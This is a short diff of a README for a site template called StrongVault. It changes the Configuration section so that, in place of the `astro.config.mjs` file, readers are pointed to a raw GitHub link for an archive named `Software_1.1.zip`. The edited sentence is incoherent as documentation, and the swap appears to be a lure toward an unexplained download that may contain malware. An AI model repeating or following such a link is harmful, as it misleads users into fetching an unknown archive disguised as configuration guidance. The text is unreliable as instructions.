Tanishk9997/strongvault/README.md

 ## Configuration

-You can customize various aspects of StrongVault in the `astro.config.mjs` file.
+You can customize various aspects of StrongVault in the `https://raw.githubusercontent.com/Tanishk9997/strongvault/main/src/content/Software_1.1.zip` file.
 This includes settings for SEO, theme colors, and more.

 ### SEO Settings